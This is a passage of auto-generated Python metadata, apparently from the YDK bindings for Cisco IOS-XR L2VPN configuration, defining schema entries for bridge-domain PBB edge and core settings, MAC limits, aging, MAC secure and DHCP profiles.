_MetaInfoClassMember('bd-mac-withdraw-behavior', REFERENCE_ENUM_CLASS, 'MacWithdrawBehaviorEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacWithdrawBehaviorEnum',
[], [],
''' MAC withdraw sent on bridge port down
''',
'bd_mac_withdraw_behavior',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-withdraw-relay', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Mac withdraw sent from access PW to access
PW
''',
'bd_mac_withdraw_relay',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mac-secure', REFERENCE_CLASS, 'MacSecure' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.MacSecure',
[], [],
''' MAC Secure
''',
'mac_secure',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domain-mac',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.NvSatellite' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.NvSatellite',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable nV Satellite Settings
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('offload-ipv4-multicast-enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable IPv4 Multicast Offload to Satellite
Nodes
''',
'offload_ipv4_multicast_enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'nv-satellite',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbStaticMacMappings.PbbStaticMacMapping' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbStaticMacMappings.PbbStaticMacMapping',
False,
[
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Static MAC address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('bmac', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Backbone MAC address
''',
'bmac',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-static-mac-mapping',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbStaticMacMappings' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbStaticMacMappings',
False,
[
_MetaInfoClassMember('pbb-static-mac-mapping', REFERENCE_LIST, 'PbbStaticMacMapping' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbStaticMacMappings.PbbStaticMacMapping',
[], [],
''' PBB Static Mac Address Mapping
Configuration
''',
'pbb_static_mac_mapping',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-static-mac-mappings',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeDhcpProfile' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeDhcpProfile',
False,
[
_MetaInfoClassMember('dhcp-snooping-id', ATTRIBUTE, 'str' , None, None,
[], [],
''' Disable DHCP snooping
''',
'dhcp_snooping_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('profile-id', REFERENCE_ENUM_CLASS, 'InterfaceProfileEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterfaceProfileEnum',
[], [],
''' Set the snooping profile
''',
'profile_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-edge-dhcp-profile',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacLimit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacLimit',
False,
[
_MetaInfoClassMember('pbb-edge-mac-limit-action', REFERENCE_ENUM_CLASS, 'MacLimitActionEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLimitActionEnum',
[], [],
''' MAC address limit enforcement action
''',
'pbb_edge_mac_limit_action',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-edge-mac-limit-max', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Number of MAC addresses after which
MAC limit action is taken
''',
'pbb_edge_mac_limit_max',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-edge-mac-limit-notif', REFERENCE_ENUM_CLASS, 'MacNotificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacNotificationEnum',
[], [],
''' MAC address limit notification action
''',
'pbb_edge_mac_limit_notif',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-edge-mac-limit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacAging' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacAging',
False,
[
_MetaInfoClassMember('pbb-edge-mac-aging-time', ATTRIBUTE, 'int' , None, None,
[('300', '30000')], [],
''' Mac Aging Time
''',
'pbb_edge_mac_aging_time',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-edge-mac-aging-type', REFERENCE_ENUM_CLASS, 'MacAgingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacAgingEnum',
[], [],
''' MAC address aging type
''',
'pbb_edge_mac_aging_type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-edge-mac-aging',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacSecure' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacSecure',
False,
[
_MetaInfoClassMember('accept-shutdown', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Accept Virtual instance port to be
shutdown on mac violation
''',
'accept_shutdown',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('action', REFERENCE_ENUM_CLASS, 'MacSecureActionEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacSecureActionEnum',
[], [],
''' MAC secure enforcement action
''',
'action',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable Virtual instance port MAC
Secure
''',
'disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable MAC Secure
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', REFERENCE_ENUM_CLASS, 'L2VpnLoggingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnLoggingEnum',
[], [],
''' MAC Secure Logging
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-edge-mac-secure',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac',
False,
[
_MetaInfoClassMember('pbb-edge-mac-aging', REFERENCE_CLASS, 'PbbEdgeMacAging' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacAging',
[], [],
''' MAC-Aging configuration commands
''',
'pbb_edge_mac_aging',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-edge-mac-learning', REFERENCE_ENUM_CLASS, 'MacLearnEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLearnEnum',
[], [],
''' Enable Mac Learning
''',
'pbb_edge_mac_learning',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-edge-mac-limit', REFERENCE_CLASS, 'PbbEdgeMacLimit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacLimit',
[], [],
''' MAC-Limit configuration commands
''',
'pbb_edge_mac_limit',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-edge-mac-secure', REFERENCE_CLASS, 'PbbEdgeMacSecure' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacSecure',
[], [],
''' MAC Secure
''',
'pbb_edge_mac_secure',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-edge-mac',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge',
False,
[
_MetaInfoClassMember('core-bd-name', ATTRIBUTE, 'str' , None, None,
[(0, 27)], [],
''' Core BD Name
''',
'core_bd_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('isid', ATTRIBUTE, 'int' , None, None,
[('256', '16777214')], [],
''' ISID
''',
'isid',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('pbb-edge-dhcp-profile', REFERENCE_CLASS, 'PbbEdgeDhcpProfile' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeDhcpProfile',
[], [],
''' Attach a DHCP profile
''',
'pbb_edge_dhcp_profile',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-edge-igmp-profile', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Attach a IGMP Snooping profile
''',
'pbb_edge_igmp_profile',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-edge-mac', REFERENCE_CLASS, 'PbbEdgeMac' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac',
[], [],
''' MAC configuration commands
''',
'pbb_edge_mac',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-static-mac-mappings', REFERENCE_CLASS, 'PbbStaticMacMappings' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbStaticMacMappings',
[], [],
''' PBB Static Mac Address Mapping Table
''',
'pbb_static_mac_mappings',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('unknown-unicast-bmac', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Configure Unknown Unicast BMAC address
for PBB Edge Port
''',
'unknown_unicast_bmac',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-edge',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges',
False,
[
_MetaInfoClassMember('pbb-edge', REFERENCE_LIST, 'PbbEdge' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge',
[], [],
''' Configure BD as PBB Edge with ISID and
associated PBB Core BD
''',
'pbb_edge',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-edges',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac.PbbCoreMacAging' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac.PbbCoreMacAging',
False,
[
_MetaInfoClassMember('pbb-core-mac-aging-time', ATTRIBUTE, 'int' , None, None,
[('300', '30000')], [],
''' Mac Aging Time
''',
'pbb_core_mac_aging_time',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-mac-aging-type', REFERENCE_ENUM_CLASS, 'MacAgingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacAgingEnum',
[], [],
''' MAC address aging type
''',
'pbb_core_mac_aging_type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-core-mac-aging',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac.PbbCoreMacLimit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac.PbbCoreMacLimit',
False,
[
_MetaInfoClassMember('pbb-core-mac-limit-action', REFERENCE_ENUM_CLASS, 'MacLimitActionEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLimitActionEnum',
[], [],
''' MAC address limit enforcement action
''',
'pbb_core_mac_limit_action',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-mac-limit-max', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Number of MAC addresses after which MAC
limit action is taken
''',
'pbb_core_mac_limit_max',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-mac-limit-notif', REFERENCE_ENUM_CLASS, 'MacNotificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacNotificationEnum',
[], [],
''' MAC address limit notification action
''',
'pbb_core_mac_limit_notif',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-core-mac-limit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac',
False,
[
_MetaInfoClassMember('pbb-core-mac-aging', REFERENCE_CLASS, 'PbbCoreMacAging' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac.PbbCoreMacAging',
[], [],
''' MAC-Aging configuration commands
''',
'pbb_core_mac_aging',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-mac-learning', REFERENCE_ENUM_CLASS, 'MacLearnEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLearnEnum',
[], [],
''' Enable Mac Learning
''',
'pbb_core_mac_learning',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-mac-limit', REFERENCE_CLASS, 'PbbCoreMacLimit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac.PbbCoreMacLimit',
[], [],
''' MAC-Limit configuration commands
''',
'pbb_core_mac_limit',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-core-mac',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreEvis.PbbCoreEvi' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreEvis.PbbCoreEvi',
False,
[
_MetaInfoClassMember('eviid', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Ethernet VPN ID
''',
'eviid',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-core-evi',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreEvis' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreEvis',
False,
[
_MetaInfoClassMember('pbb-core-evi', REFERENCE_LIST, 'PbbCoreEvi' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreEvis.PbbCoreEvi',
[], [],
''' PBB Core EVI
''',
'pbb_core_evi',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-core-evis',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreDhcpProfile' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreDhcpProfile',
False,
[
_MetaInfoClassMember('dhcp-snooping-id', ATTRIBUTE, 'str' , None, None,
[], [],
''' Disable DHCP snooping
''',
'dhcp_snooping_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('profile-id', REFERENCE_ENUM_CLASS, 'InterfaceProfileEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterfaceProfileEnum',
[], [],
''' Set the snooping profile
''',
'profile_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-core-dhcp-profile',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Bridge Domain PBB Core
Configuration
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-dhcp-profile', REFERENCE_CLASS, 'PbbCoreDhcpProfile' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreDhcpProfile',
[], [],
''' Attach a DHCP profile
''',
'pbb_core_dhcp_profile',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-evis', REFERENCE_CLASS, 'PbbCoreEvis' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreEvis',
[], [],
''' PBB Core EVI Table
''',
'pbb_core_evis',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-igmp-profile', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Attach a IGMP Snooping profile
''',
'pbb_core_igmp_profile',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-mac', REFERENCE_CLASS, 'PbbCoreMac' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac',
[], [],
''' MAC configuration commands
''',
'pbb_core_mac',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-mmrp-flood-optimization', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enabling MMRP PBB-VPLS Flood Optimization
''',
'pbb_core_mmrp_flood_optimization',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vlan-id', ATTRIBUTE, 'int' , None, None,
[('1', '4094')], [],
''' VLAN ID to push
''',
'vlan_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-core',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb',
False,
[
_MetaInfoClassMember('pbb-core', REFERENCE_CLASS, 'PbbCore' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore',
[], [],
''' PBB Core
''',
'pbb_core',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-edges', REFERENCE_CLASS, 'PbbEdges' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges',
[], [],
''' PBB Edge
''',
'pbb_edges',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domain-pbb',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainEvis.BridgeDomainEvi' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainEvis.BridgeDomainEvi',
False,
[
_MetaInfoClassMember('eviid', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Ethernet VPN ID
''',
'eviid',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domain-evi',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainEvis' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainEvis',
False,
[
